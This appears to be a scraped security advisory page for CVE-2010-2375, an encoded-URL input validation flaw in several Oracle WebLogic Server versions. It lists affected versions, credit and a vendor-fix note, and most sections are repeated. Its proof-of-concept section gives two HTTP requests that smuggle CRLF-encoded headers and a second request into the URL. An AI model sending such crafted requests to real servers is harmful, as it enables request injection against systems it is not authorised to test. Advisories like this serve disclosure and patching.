Oracle WebLogic Server Encoded URL Remote Vulnerability
BID:41620
Info
Oracle WebLogic Server Encoded URL Remote Vulnerability
| Bugtraq ID: | 41620 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-2375 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 13 2010 12:00AM |
| Updated: | Jul 14 2010 07:16AM |
| Credit: | Timothy D. Morgan |
| Vulnerable: |
Oracle Weblogic Server 10.3.3 Oracle Weblogic Server 10.3.2 Oracle Weblogic Server 9.2 MP3 Oracle Weblogic Server 9.1 GA Oracle Weblogic Server 9.1 Oracle Weblogic Server 9.0 GA Oracle Weblogic Server 8.1 SP6 Oracle Weblogic Server 7.0 SP7 Oracle Weblogic Server 10.0 MP2 |
| Not Vulnerable: | |
Discussion
Oracle WebLogic Server Encoded URL Remote Vulnerability
Oracle WebLogic Server is prone to a remote vulnerability.
The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges.
This vulnerability affects the following supported versions:
7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3
Oracle WebLogic Server is prone to a remote vulnerability.
The vulnerability can be exploited over the 'HTTP' protocol. For an exploit to succeed, the attacker must have 'Plugins for Apache, Sun and IIS web servers' privileges.
This vulnerability affects the following supported versions:
7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, 10.3.3
Exploit / POC
Oracle WebLogic Server Encoded URL Remote Vulnerability
Attackers can exploit this issue using readily available tools.
The following example requests are available:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com
Attackers can exploit this issue using readily available tools.
The following example requests are available:
GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close
GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com
Solution / Fix
Oracle WebLogic Server Encoded URL Remote Vulnerability
Solution:
Vendor updates are available. Please contact the vendor for more information.
Solution:
Vendor updates are available. Please contact the vendor for more information.
References
Oracle WebLogic Server Encoded URL Remote Vulnerability
References:
References: